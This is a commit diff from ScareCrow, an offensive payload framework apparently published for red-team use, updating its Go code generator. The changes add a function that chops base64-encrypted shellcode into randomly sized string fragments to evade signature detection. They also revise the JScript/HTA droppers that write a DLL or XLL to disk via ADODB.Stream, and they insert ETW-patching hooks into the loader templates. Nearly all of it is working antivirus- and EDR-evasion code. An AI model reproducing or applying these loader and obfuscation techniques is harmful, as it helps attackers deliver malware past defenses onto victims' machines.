2.3

optiv · Jul 23, 2021 · 5fa4eae · 5fa4eae
1 parent 162be1b
commit 5fa4eae
Show file tree

Hide file tree

Showing 4 changed files with 55 additions and 36 deletions.
diff --git a/Loader/Loader.go b/Loader/Loader.go
@@ -143,7 +143,8 @@ func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, ref
 	WindowsVersion := &WindowsVersion{}
 	WindowsVersion.Variables = make(map[string]string)
 
-	DLL.Variables["ciphertext"] = b64ciphertext
+	DLL.Variables["fullciphertext"] = Cryptor.VarNumberLength(4, 12)
+	DLL.Variables["ciphertext"] = Utils.B64ripper(b64ciphertext, DLL.Variables["fullciphertext"], true)
 	DLL.Variables["key"] = b64key
 	DLL.Variables["iv"] = b64iv
 	DLL.Variables["vkey"] = Cryptor.VarNumberLength(4, 12)
@@ -404,17 +405,8 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
 	Binary.Variables = make(map[string]string)
 	WindowsVersion := &WindowsVersion{}
 	WindowsVersion.Variables = make(map[string]string)
-	splitval := len(b64ciphertext)
-	splitval = splitval - 45
-	encodedfirsthalf := string(b64ciphertext[:splitval])
-	encodedsecondhalf := string(b64ciphertext[splitval:])
-
-	Binary.Variables["ciphertext"] = b64ciphertext
 	Binary.Variables["fullciphertext"] = Cryptor.VarNumberLength(4, 12)
-	Binary.Variables["b64_string1name"] = Cryptor.VarNumberLength(4, 12)
-	Binary.Variables["b64_string2name"] = Cryptor.VarNumberLength(4, 12)
-	Binary.Variables["b64_string1value"] = encodedfirsthalf
-	Binary.Variables["b64_string2value"] = encodedsecondhalf
+	Binary.Variables["ciphertext"] = Utils.B64ripper(b64ciphertext, Binary.Variables["fullciphertext"], true)
 	Binary.Variables["key"] = b64key
 	Binary.Variables["iv"] = b64iv
 	Binary.Variables["vkey"] = Cryptor.VarNumberLength(4, 12)
@@ -782,18 +774,10 @@ func JScript_Buff(fso string, dropPath string, encoded string, code string, name
 	SandboxJScript := &SandboxJScript{}
 	JScript.Variables = make(map[string]string)
 	SandboxJScript.Variables = make(map[string]string)
-
-	rawstring := []rune(encoded)
-	splitval := len(rawstring)
-	splitval = splitval - 45
-	encodedfirsthalf := string(rawstring[:splitval])
-	encodedsecondhalf := string(rawstring[splitval:])
-
 	JScript.Variables["DLLName"] = Cryptor.VarNumberLength(4, 12)
 	JScript.Variables["fso"] = fso
 	JScript.Variables["dropPath"] = dropPath
 	JScript.Variables["Base64"] = Cryptor.VarNumberLength(4, 12)
-	JScript.Variables["dll"] = Cryptor.VarNumberLength(4, 12)
 	JScript.Variables["base6411"] = Cryptor.VarNumberLength(4, 12)
 	JScript.Variables["rtest"] = Cryptor.VarNumberLength(4, 12)
 	JScript.Variables["atest"] = Cryptor.VarNumberLength(4, 12)
@@ -810,11 +794,8 @@ func JScript_Buff(fso string, dropPath string, encoded string, code string, name
 	JScript.Variables["BinaryStream"] = Cryptor.VarNumberLength(4, 12)
 	JScript.Variables["binaryWriter"] = Cryptor.VarNumberLength(4, 12)
 	JScript.Variables["dllname"] = ""
-	JScript.Variables["dll_string1name"] = Cryptor.VarNumberLength(4, 12)
-	JScript.Variables["dll_string2name"] = Cryptor.VarNumberLength(4, 12)
-	JScript.Variables["dll_string1"] = encodedfirsthalf
-	JScript.Variables["dll_string2"] = encodedsecondhalf
-	JScript.Variables["dll_code"] = encoded
+	JScript.Variables["dllvar"] = Cryptor.VarNumberLength(4, 12)
+	JScript.Variables["dll"] = Utils.B64ripper(encoded, JScript.Variables["dllvar"], false)
 	JScript.Variables["Loader"] = code
 	if mode == "excel" {
 		JScript.Variables["dllext"] = ".xll"
@@ -999,7 +980,6 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co
 	finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox)
 	URL = Utils.Command(URL, CommandLoader, outFile)
 	if CommandLoader == "hta" {
-		//finalcode = HTA_Buff(finalcode)
 		hexcode := hex.EncodeToString(content)
 		finalcode = HTA_Buff(hexcode, filename)
 

diff --git a/ScareCrow b/ScareCrow
diff --git a/Struct/Struct.go b/Struct/Struct.go
@@ -198,13 +198,9 @@ func JSfile() string {
     function {{.Variables.binaryWriter}}({{.Variables.res1}},{{.Variables.filename1}})
     {var {{.Variables.base6411}}decoded=Magic1({{.Variables.res1}});var {{.Variables.TextStream11}}=new ActiveXObject('ADODB.Stream');{{.Variables.TextStream11}}.Type=2;{{.Variables.TextStream11}}.charSet='iso-8859-1';{{.Variables.TextStream11}}.Open();{{.Variables.TextStream11}}.WriteText({{.Variables.base6411}}decoded);var {{.Variables.BinaryStream}}=new ActiveXObject('ADODB.Stream');{{.Variables.BinaryStream}}.Type=1;{{.Variables.BinaryStream}}.Open();{{.Variables.TextStream11}}.Position=0;{{.Variables.TextStream11}}.CopyTo({{.Variables.BinaryStream}});{{.Variables.BinaryStream}}.SaveToFile({{.Variables.filename1}},2);{{.Variables.BinaryStream}}.Close()}
 
-	var {{.Variables.dll_string1name}} = '{{.Variables.dll_string1}}';
-	var {{.Variables.dll_string2name}} = '{{.Variables.dll_string2}}';
-	
-	var {{.Variables.dll}} = {{.Variables.dll_string1name}} + {{.Variables.dll_string2name}};
-    
+    {{.Variables.dll}}
    
-	{{.Variables.binaryWriter}}({{.Variables.dll}},{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}");
+	{{.Variables.binaryWriter}}({{.Variables.dllvar}},{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}");
 	{{.Variables.Loader}}
 
 
@@ -331,6 +327,8 @@ func DLL_Refresher() string {
 
 	}
 
+	{{.Variables.ETW_Function}}
+
 	func main() {
 	}
 
@@ -344,7 +342,10 @@ func DLL_Refresher() string {
 		if {{.Variables.Version}} == "10.0" {
 			{{.Variables.loader}}()
 		}
-		{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString("{{.Variables.ciphertext}}")
+		{{.Variables.ETW}}
+		{{.Variables.ciphertext}}
+		{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString({{.Variables.fullciphertext}})
+
 		{{.Variables.vkey}}, _ := base64.StdEncoding.DecodeString("{{.Variables.key}}")
 		{{.Variables.viv}}, _ := base64.StdEncoding.DecodeString("{{.Variables.iv}}")
 	
@@ -573,9 +574,7 @@ func Binary() string {
 		{{.Variables.Pointer}}
 		{{.Variables.ptr}} := func() {
 		}
-		{{.Variables.b64_string1name}} := "{{.Variables.b64_string1value}}"
-		{{.Variables.b64_string2name}} := "{{.Variables.b64_string2value}}"
-		{{.Variables.fullciphertext}} := {{.Variables.b64_string1name}} + {{.Variables.b64_string2name}} 
+		{{.Variables.ciphertext}}
 		{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString({{.Variables.fullciphertext}})
 		{{.Variables.vkey}}, _ := base64.StdEncoding.DecodeString("{{.Variables.key}}")
 		{{.Variables.viv}}, _ := base64.StdEncoding.DecodeString("{{.Variables.iv}}")
@@ -769,7 +768,9 @@ func DLL() string {
 	func Start() {
 		{{.Variables.Sandbox}}
 		{{.Variables.Versionfunc}}()
-		{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString("{{.Variables.ciphertext}}")
+		{{.Variables.ETW}}
+		{{.Variables.ciphertext}}
+		{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString({{.Variables.fullciphertext}})
 		{{.Variables.vkey}}, _ := base64.StdEncoding.DecodeString("{{.Variables.key}}")
 		{{.Variables.viv}}, _ := base64.StdEncoding.DecodeString("{{.Variables.iv}}")
 	

diff --git a/Utils/Utils.go b/Utils/Utils.go
@@ -1,6 +1,7 @@
 package Utils
 
 import (
+	"ScareCrow/Cryptor"
 	"archive/zip"
 	"encoding/base64"
 	"fmt"
@@ -28,6 +29,43 @@ func check(e error) {
 	}
 }
 
+func B64ripper(B64string string, B64Varible string, implant bool) string {
+	var B64payload []string
+	MAX_LENGTH := Cryptor.GenerateNumer(400, 850)
+	x := 0
+	B64length := len(B64string)
+	if implant == true {
+		B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+" string\n"))
+		for x < B64length {
+			if x+MAX_LENGTH <= B64length {
+				B64payload = append(B64payload, fmt.Sprintf("		"+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+MAX_LENGTH]))
+
+				x += MAX_LENGTH
+			} else {
+				finalLength := B64length - x
+				B64payload = append(B64payload, fmt.Sprintf("		"+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+finalLength]))
+				x += finalLength
+			}
+		}
+	} else {
+		B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+"=\"\";\n"))
+		for x < B64length {
+			if x+MAX_LENGTH <= B64length {
+				B64payload = append(B64payload, fmt.Sprintf("		"+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+MAX_LENGTH]))
+
+				x += MAX_LENGTH
+			} else {
+				finalLength := B64length - x
+				B64payload = append(B64payload, fmt.Sprintf("		"+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+finalLength]))
+				x += finalLength
+			}
+		}
+
+	}
+	finalstring := strings.Join(B64payload, "")
+	return finalstring
+}
+
 func Unzip(src string, dest string) ([]string, error) {
 	var filenames []string
 	r, err := zip.OpenReader(src)